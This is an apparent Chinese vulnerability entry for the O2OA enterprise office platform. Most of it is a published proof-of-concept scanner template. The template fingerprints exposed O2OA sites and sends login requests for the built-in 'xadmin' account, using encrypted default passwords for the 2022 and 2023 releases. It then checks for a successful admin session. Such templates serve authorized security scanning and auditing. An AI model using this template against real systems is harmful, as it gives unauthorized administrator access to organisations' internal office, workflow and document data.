漏洞描述
O2OA是一款开源免费的企业及团队办公平台,提供门户管理、流程管理、信息管理、数据管理四大平台,集工作汇报、项目协作、移动OA、文档分享、流程审批、数据协作等众多功能,满足企业各类管理和协作需求
title=="O2OA"
o2oa-default-password: o2oa default password
PoC代码[已公开]
id: o2oa-default-password
info:
name: o2oa default password
author: zan8in
severity: high
verified: true
description: |
O2OA是一款开源免费的企业及团队办公平台,提供门户管理、流程管理、信息管理、数据管理四大平台,集工作汇报、项目协作、移动OA、文档分享、流程审批、数据协作等众多功能,满足企业各类管理和协作需求
title=="O2OA"
rules:
# o2oa@2022
r0:
request:
method: POST
path: /x_organization_assemble_authentication/jaxrs/authentication/captcha?v=7.3&lg6aq1g1
headers:
Content-Type: application/json; charset=UTF-8
Cookie: x-token=anonymous
Authorization: anonymous
body: |
{"credential":"xadmin","password":"Kn2Q3eM/KMmNrM287ju4ELXjA63+86QJOQ4mE6ASnn6mdUmp6K4gfarzQxGzl1VwFbskPkk5p34uCEbm4WDa9LYjB7e/GtFpSakHkb3HVc7EmZF9Reap/ci2Ern00lMJIl4/1RFYGNO1MYNJtEAfcG8NVpgG7FaFAm8Dbw+Tb9U=","isEncrypted":"y"}
expression: response.status ==200 && response.body.bcontains(b'"employee":') && response.body.bcontains(b'"success"') && response.body.bcontains(b'"xadmin"')
# o2oa@2023
r1:
request:
method: POST
path: /x_organization_assemble_authentication/jaxrs/authentication/captcha?v=7.3&lg6aq1g1
headers:
Content-Type: application/json; charset=UTF-8
Cookie: x-token=anonymous
Authorization: anonymous
body: |
{"credential":"xadmin","password":"gHWEGj1JLs4tb+keBei3vWNAePf9kqZ6dWDjx0D2J+FOl4nZqpL2aXcMHu0Hu1E/F04DIaw9z02BrRIzRyP/oLyx1x8gw9FbP20Aq8EhAFx9Nz6YbthdUhl7x+UZAalmk6FmsKnup3Yh1N/rTG11mOtfRZTIeGVHYz6iFfkiyI0=","isEncrypted":"y"}
expression: response.status ==200 && response.body.bcontains(b'"employee":') && response.body.bcontains(b'"success"') && response.body.bcontains(b'"xadmin"')
expression: r0() || r1()